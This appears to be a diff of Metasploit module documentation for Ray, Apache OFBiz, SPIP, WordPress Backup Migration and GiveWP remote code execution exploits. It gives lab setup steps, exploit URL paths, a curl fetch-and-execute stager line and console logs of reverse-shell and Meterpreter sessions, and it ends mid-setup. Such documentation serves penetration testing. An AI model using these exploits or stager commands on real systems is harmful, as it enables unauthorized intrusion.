+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2
+[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (36 bytes) to 192.168.56.6
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Server stopped.
+
+whoami
+ray
+pwd
+/home/ray
+```
@@ -3,6 +3,19 @@ Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulne
 endpoint `/webtools/control/forgotPassword` allows an attacker to access the `ProgramExport` endpoint which in
 turn allows for remote code execution in the context of the user running the application.

+It was then discovered that the use of the path traversal vulnerability is not required in order to access
+the vulnerable endpoint ProgramExport. CVE-2024-38856 was given for this Incorrect Authorization vulnerability
+and was patched in 18.12.15.
+
+This module was originally written the exploit CVE-2024-32113, but upon the discovery of CVE-2024-38856 the
+module updated to not exploit the path traversal vulnerability allowing for exploitation on 18.12.14 as well.
+
+CVE-2024-32113, Path Traversal, patched in 18.12.13:
+`/webtools/control/forgotPassword;../ProgramExport`
+
+CVE-2024-38856, Incorrect Authorization, patched in 18.12.14:
+`/webtools/control/forgotPassword/ProgramExport`
+
 ### Description
 The module can exploit Apache OFBiz running on both Windows and Linux. OFBiz has list of `deniedWebShellTokens`
 which includes strings like `curl` and `chmod` which attempts to prevent ProgramExport from being exploited. The list
@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in SPIP
+versions up to and including 4.3.1, specifically in the BigUp plugin.
+The vulnerability occurs due to improper handling of file uploads in the
+`lister_fichiers_par_champs` function, which can be exploited by crafting a malicious multipart form request.
+This allows an attacker to inject and execute arbitrary PHP code on the server.
+
+### Non-Docker Setup
+
+To replicate a vulnerable environment for testing, follow these steps:
+
+1. Download and set up SPIP version 4.3.1.
+2. Use the built-in PHP server to host the SPIP instance.
+
+#### Commands to Set Up the Vulnerable Environment:
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.3.1.zip
+mkdir spip && mv spip-v4.3.1.zip spip
+cd spip && unzip spip-v4.3.1.zip
+php -S 0.0.0.0:8000
+```
+
+- **SPIP Access URL:** `http://localhost:8000`
+- **SPIP Version:** 4.3.1
+
+After starting the PHP server, SPIP will be accessible at `http://localhost:8000`.
+
+To complete the installation:
+
+1. Navigate to `http://localhost:8000/ecrire` to access the SPIP web installation panel.
+2. Follow the on-screen instructions to complete the setup.
+
+### Docker Setup
+
+To replicate a vulnerable environment for testing, follow these steps:
+
+1. Pull the vulnerable SPIP Docker image:
+
+```bash
+docker run --name casse-spip -p 8000:80 \
+    -e SPIP_DB_SERVER=sqlite3 \
+    -e SPIP_SITE_ADDRESS=http://localhost \
+    -d ipeos/spip:4.3.1
+```
+
+2. Go to `http://localhost:8000` to access the SPIP application.
+
+## Verification Steps
+
+1. Set up a SPIP instance using the commands provided above.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/spip_bigup_unauth_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+### FORM_PAGE
+This option allows you to specify a custom page on the target SPIP installation that contains a form.
+By default, the module will automatically check the `login`, `spip_pass`, and `contact` pages for forms,
+but if you know of another page that contains a form, you can specify it here.
+For example, if an article page contains a form, you can set this option like so:
+
+```
+set FORM_PAGE /spip.php?article1
+```
+
+This will instruct the module to look for the form data on `/spip.php?article1`.
+If the specified page contains the vulnerable form, the module will proceed with the exploitation.
+This option is particularly useful when the default pages (`login`, `spip_pass` and `contact`)
+do not contain the form or are not accessible.
+
+## Scenarios
+
+### Successful Exploitation Against Local SPIP 4.3.1
+
+**Setup**:
+
+- Local SPIP instance with version 4.3.1.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module via `use exploit/multi/http/spip_bigup_unauth_rce`
+3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
+4. Configure other necessary options (`TARGETURI`, `SSL`, etc.).
+5. Launch the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```bash
+msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.3.1
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
+[*] Preparing to send exploit payload to the target...
+[*] Sending stage (39927 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.17.0.2:54956) at 2024-09-08 05:53:39 +0200
+
+meterpreter > sysinfo 
+Computer    : d6c6866cac5a
+OS          : Linux d6c6866cac5a 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```bash
+msf6 exploit(multi/http/spip_bigup_unauth_rce) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.3.1
+[+] SPIP version 4.3.1 is vulnerable.
+[*] Bigup plugin version detected: 3.2.11
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.3.1) and bigup version (3.2.11) are vulnerable.
+[*] Found formulaire_action: login
+[*] Found formulaire_action_args: yt4d8ri/avF6LO/OwLA2O...
+[*] Preparing to send exploit payload to the target...
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.17.0.2:55956) at 2024-09-08 05:54:43 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.17.0.2
+OS           : Debian 11.10 (Linux 5.15.0-119-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
+
+**Note**: Ensure the SPIP instance is correctly configured and running using the manual setup for the exploit to work as expected.
@@ -0,0 +1,146 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection vulnerability in SPIP.
+The vulnerability exists in the `connect` parameter, allowing an unauthenticated
+user to execute arbitrary commands with web user privileges.
+Branches 2.0, 2.1, and 3 are affected.
+Vulnerable versions are < 2.0.21, < 2.1.16, and < 3.0.3.
+This module is compatible with both Unix/Linux and Windows platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20
+on Apache running on Ubuntu, Fedora, and Windows Server.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/SPIP-v2-0-0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp SPIP-v2-0-0.zip spip-site/ 
+cd spip-site/ 
+unzip SPIP-v2-0-0.zip
+```
+
+Install PHP 5.6 and the necessary extensions:
+
+1. Add the PPA for PHP 5.6:
+
+```
+sudo add-apt-repository ppa:ondrej/php
+sudo apt-get update
+```
+
+2. Install PHP 5.6 with SQLite extensions:
+
+```
+sudo apt-get install php5.6 php5.6-sqlite php5.6-sqlite3
+```
+
+3. Enable the required extensions in the PHP configuration file:
+
+Open the PHP INI file for CLI:
+
+```
+sudo nano /etc/php/5.6/cli/php.ini
+```
+
+Add or uncomment the following lines:
+
+```
+extension=sqlite3.so
+extension=pdo_sqlite.so
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php5.6 -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_connect_exec`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+
+### SPIP 2.0.0 - Linux target - PHP In-Memory
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:47020) at 2024-08-22 19:19:00 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 2.0.0
+[+] The target appears to be vulnerable.
+[*] 192.168.1.36:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:32794) at 2024-08-22 19:20:41 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 2.0.0 - Windows Command Shell
+
+```
+Somehow, I was unable to obtain a remote code execution (RCE) on my lab environment using the Windows Command Shell target. 
+However, based on the exploit's design and its success on other platforms, it is expected to work. 
+The issue might be specific to my lab setup.
+```
@@ -0,0 +1,176 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
+The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker
+to inject and execute arbitrary PHP code.
+This can be achieved by crafting a payload that manipulates the templating data processed by the `echappe_retour()` function,
+which invokes `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.
+
+To replicate a vulnerable environment for testing:
+
+1. Install SPIP using the provided Docker Compose configuration.
+2. Use the image `ipeos/spip:4.2.12` to ensure the environment is vulnerable.
+3. Verify that the SPIP instance is accessible on the local network.
+
+### Docker Setup
+
+Use the following Docker Compose file to set up the environment:
+
+```yaml
+version: '3.8'
+
+services:
+  db:
+    image: mariadb:10.5
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=MysqlRootPassword
+      - MYSQL_DATABASE=spip
+      - MYSQL_USER=spip
+      - MYSQL_PASSWORD=spip
+    volumes:
+      - mysql-data:/var/lib/mysql
+
+  app:
+    image: ipeos/spip:4.2.12
+    restart: always
+    depends_on:
+      - db
+    environment:
+      - SPIP_SITE_ADDRESS=http://localhost:8880
+      - SPIP_DB_SERVER=db
+      - SPIP_DB_LOGIN=spip
+      - SPIP_DB_PASS=spip
+      - SPIP_DB_NAME=spip
+      - SPIP_AUTO_INSTALL=1
+    ports:
+      - 8880:80
+    volumes:
+      - spip-data:/var/www/html
+
+volumes:
+  spip-data:
+  mysql-data:
+```
+
+This Docker Compose file configures a SPIP environment with a MariaDB backend, enabling automatic installation.
+Here are the correct setup details:
+
+- **SPIP Access URL:** `http://localhost:8880`
+- **Database Configuration:** Utilizes MariaDB, as specified by the database service setup.
+- **Automatic Installation:** Enabled via `SPIP_AUTO_INSTALL=1`.
+
+After launching the Docker container, SPIP will be accessible at `http://localhost:8880`.
+The automatic installation will simplify the initial setup, allowing you to start using SPIP without manual configuration.
+
+If you decide to disable automatic installation by setting `SPIP_AUTO_INSTALL` to `0`, you will need to manually configure SPIP.
+To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.
+
+### Non-Docker Setup
+
+If you prefer not to use Docker, you can manually set up SPIP with the following commands:
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
+unzip spip-v4.2.12.zip
+cd spip-v4.2.12
+php -S 0.0.0.0:8000
+```
+
+Accessible at `http://localhost:8000`.
+
+## Verification Steps
+
+1. Set up a SPIP instance with the specified Docker environment.
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/spip_porte_plume_previsu_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No additional options are required for basic exploitation.
+
+## Scenarios
+
+### Successful Exploitation Against Local SPIP 4.2.12
+
+**Setup**:
+
+- Local SPIP instance with version 4.2.12.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/spip_porte_plume_previsu_rce
+```
+3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] SPIP version 4.2.12 is vulnerable.
+[*] Porte plume plugin version detected: 3.1.5
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.2.12) and bigup version (3.1.5) are vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending exploit payload to the target...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:43974) at 2024-09-08 06:46:50 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > run http://127.0.0.1:8000
+
+[*] Command to run on remote host: curl -so ./gYBuGbOLFH http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA; chmod +x ./gYBuGbOLFH; ./gYBuGbOLFH &
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.12
+[+] SPIP version 4.2.12 is vulnerable.
+[*] Porte plume plugin version detected: 3.1.5
+[+] The target appears to be vulnerable. Both the detected SPIP version (4.2.12) and bigup version (3.1.5) are vulnerable.
+[*] Preparing to send exploit payload to the target...
+[*] Sending exploit payload to the target...
+[*] Client 192.168.1.36 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.36 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:60244) at 2024-09-08 06:47:47 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-119-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.
+
+**Note**: Ensure the SPIP instance is correctly configured and running in the Docker environment for the exploit to work as expected.
@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This module exploits a PHP code injection in SPIP. The vulnerability exists in
+the `oubli` parameter and allows an unauthenticated user to execute arbitrary
+commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are
+concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.
+
+The module's `check` method attempts to obtain the SPIP version via a simple HTTP GET request to `/spip.php`
+page and fingerprints it either via the `generator` meta tag, or by the
+`Composed-By` header.
+
+This module has been successfully tested against SPIP version 4.0.0.
+
+## Setup
+
+On Ubuntu 20.04, download a vulnerable instance of SPIP:
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.2.0.zip
+```
+
+Unzip it to a specific folder:
+
+```
+mkdir spip-site 
+cp spip-v4.2.0.zip spip-site/ 
+cd spip-site / 
+unzip spip-v4.2.0.zip
+```
+
+Install php and the necessary extensions:
+
+```
+sudo apt install -y php-xml php-zip php-sqlite3
+```
+
+Serve the application (while in the newly created spip-site directory):
+
+```
+php -S 127.0.0.1:8000
+```
+
+Navigate to the following URL, select `sqlite` for the database, and complete the installation:
+
+```
+http://127.0.0.1:8000/ecrire/
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/spip_rce_form`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `exploit`
+
+## Options
+
+No options
+
+## Targets
+
+### 0 (PHP In-Memory)
+
+This uses an in-memory PHP payload to execute code.
+
+### 1 (Unix/Linux Command Shell)
+
+This executes a Unix or Linux command.
+
+### 2 (Windows Command Shell)
+
+This executes a Windows command.
+
+## Scenarios
+### SPIP 4.2.0 - Linux target - PHP In-Memory
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (39927 bytes) to 192.168.1.36
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.36:36488) at 2024-08-22 15:01:39 +0200
+
+meterpreter > sysinfo 
+Computer    : linux
+OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### SPIP 4.2.0 - Unix/Linux Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://127.0.0.1:8000
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: ZHsLFRQTGY9p0wCEbpT7JK7YhYzOupYuxRemHQ1KrmNOIonsgMLbNrmlewZfSwqzqLwjMMOcYBE5vNpVUt42LFLfKdJC9p94qg==
+[*] 127.0.0.1:8000 - Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 192.168.1.36
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.36:46044) at 2024-08-22 15:03:31 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.36
+OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### SPIP 4.2.0 - Windows Command Shell
+
+```
+msf6 exploit(multi/http/spip_rce_form) > run http://192.168.1.48
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.2.0
+[+] The target appears to be vulnerable.
+[*] Got anti-csrf token: Z1kE0G5FLDrWkF9cvFp5ZuEKbtEjqIxoWTXL9HxYFP/xXeUohvYklG+kfLo32Cas24teZEJVX4e10CE5HEAjZ4HpM7VAUZoh
+[*] 192.168.1.48:80 - Attempting to exploit...
+[*] Sending stage (201798 bytes) to 192.168.1.48
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.48:50092) at 2024-08-22 14:59:16 +0200
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-NHU31ET
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : fr_FR
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+```
@@ -7,12 +7,13 @@ The vuln makes use of a neat technique called PHP Filter Chaining which allows a
 bytes to a string by continuously chaining character encoding conversion. This allows an attacker to prepend
 a PHP payload to a string which gets evaluated by a require statement, which results in command execution.

-### Setup 
+## Setup

 Spin up a Wordpress instance by running `docker-compose up` in the same directory as the `docker-compose.yml` file below:
+
 ```
 version: "3"
-# Defines which compose version to use
+  # Defines which compose version to use
 services:
  # Services line define which Docker images to run. In this case, it will be MySQL server and WordPress image.
  db:
@@ -32,14 +33,14 @@ services:
    restart: always
    # Restart line controls the restart mode, meaning if the container stops running for any reason, it will restart the process immediately.
    ports:
-      - "8000:80"
-      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:8000
+      - "5555:80"
+      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:5555
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: MyWordPressUser
      WORDPRESS_DB_PASSWORD: Pa$$5w0rD
      WORDPRESS_DB_NAME: MyWordPressDatabaseName
-# Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
+  # Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
    volumes:
      ["./:/var/www/html"]
 volumes:
@@ -47,11 +48,14 @@ volumes:
 ```

 Download the vulnerable Backup Migration plugin: `https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip`.
-Navigate to `http://localhost:8000` and you'll be redirected and asked to setup the WordPress site. This includes 
+Navigate to `http://localhost:5555` and you'll be redirected and asked to setup the WordPress site. This includes
 setting a username, password, email address for the admin user etc. Once the setup is complete login as the newly created
 admin user and via the options on the left side of the screen navigate to the `Plugins` and select `Add New`. Upload the
 `backup-backup.1.3.7.zip` file. You should now see `Backup Migration` in the list of Plugins, select `Activate` on the
-plugin. You should now have a vulnerable instance running. 
+plugin. You should now have a vulnerable instance running.
+
+## Options
+No options

 ## Verification Steps

@@ -62,34 +66,35 @@ plugin. You should now have a vulnerable instance running.
 1. Receive a Meterpreter session in the context of the user running the WordPress application.

 ## Scenarios
-### Backup Migration Plugin version: 1.3.7 (Containerized WordPress Version 6.0)
+### Backup Migration Plugin version: 1.3.7 (Containerized WordPress Version 6.5.3)
+
+Using `php/meterpreter/reverse_tcp`:
+
 ```
-msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rport 8000
-rport => 8000
-msf6 exploit(multi/http/wp_backup_migration_php_filter) > set lhost 192.168.123.1
-lhost => 192.168.123.1
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rhosts 192.168.1.36
+rhosts => 192.168.1.36
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rport 5555
+rport => 5555
+
 msf6 exploit(multi/http/wp_backup_migration_php_filter) > options

 Module options (exploit/multi/http/wp_backup_migration_php_filter):

-   Name              Current Setting  Required  Description
-   ----              ---------------  --------  -----------
-   PAYLOAD_FILENAME  ONxu.php         yes       The filename for the payload to be used on the target host (%RAND%.php by default)
-   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS            127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT             8000             yes       The target port (TCP)
-   SSL               false            no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI         /                yes       The base path to the wordpress application
-   VHOST                              no        HTTP server virtual host
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.36     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      5555             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host


 Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
+   LHOST  192.168.1.36     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


@@ -97,30 +102,50 @@ Exploit target:

   Id  Name
   --  ----
-   0   Automatic
+   0   PHP In-Memory


+msf6 exploit(multi/http/wp_backup_migration_php_filter) > exploit 

-View the full module info with the info, or info -d command.
-
-msf6 exploit(multi/http/wp_backup_migration_php_filter) > run
-
-[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Started reverse TCP handler on 192.168.1.36:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] WordPress Version: 6.0
+[*] WordPress Version: 6.5.3
 [+] Detected Backup Migration Plugin version: 1.3.7
 [+] The target appears to be vulnerable.
-[*] Writing the payload to disk, character by character, please wait...
-[*] Sending stage (39927 bytes) to 192.168.123.1
-[+] Deleted L
-[+] Deleted ONxu.php
-[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.1:56224) at 2024-01-11 12:17:34 -0500
+[*] Sending the payload, please wait...
+[*] Sending stage (39927 bytes) to 172.18.0.3
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.18.0.3:50136) at 2024-08-24 17:04:19 +0200

-meterpreter > getuid
-Server username: www-data
-meterpreter > sysinfo
-Computer    : 856d06702f34
-OS          : Linux 856d06702f34 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023 x86_64
+meterpreter > sysinfo 
+Computer    : e409ace0b2a9
+OS          : Linux e409ace0b2a9 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64
 Meterpreter : php/linux
+meterpreter > getuid 
+Server username: www-data
 meterpreter >
-```
+```
+
+Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.5.3
+[+] Detected Backup Migration Plugin version: 1.3.7
+[+] The target appears to be vulnerable.
+[*] Sending the payload, please wait...
+[*] Sending stage (3045380 bytes) to 172.18.0.3
+[*] Meterpreter session 8 opened (192.168.1.36:4444 -> 172.18.0.3:48014) at 2024-08-24 17:06:58 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.18.0.3
+OS           : Debian 12.5 (Linux 5.15.0-119-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid 
+Server username: www-data
+meterpreter > 
+```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the
+GiveWP plugin for WordPress (versions <= 3.14.1).
+The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted
+PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.
+
+## Setup
+
+1. **Docker Compose Setup**: Create the following `docker-compose.yml` file to set up a vulnerable WordPress environment:
+
+```yaml
+services:
+  db:
+    image: mysql:8.0.27
+    command: '--default-authentication-plugin=mysql_native_password'
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=somewordpress
+      - MYSQL_DATABASE=wordpress
+      - MYSQL_USER=wordpress
+      - MYSQL_PASSWORD=wordpress
+    expose:
+      - 3306
+      - 33060
+
+  wordpress:
+    image: wordpress:6.3.2
+    ports:
+      - "80:80"
+    restart: always
+    environment:
+      - WORDPRESS_DB_HOST=db
+      - WORDPRESS_DB_USER=wordpress
+      - WORDPRESS_DB_PASSWORD=wordpress
+      - WORDPRESS_DB_NAME=wordpress
+volumes:
+  db_data:
+```
+1. Run Docker: `docker compose up`
+1. Access the WordPress instance at `http://127.0.0.1` and complete the installation process
+1. **Download and Install Vulnerable GiveWP Plugin**:
+- Download the plugin: [GiveWP 3.14.1](https://downloads.wordpress.org/plugin/give.3.14.1.zip)
+- Unzip the plugin and copy it to the Docker container:
+```bash
+docker compose cp give wordpress:/var/www/html/wp-content/plugins
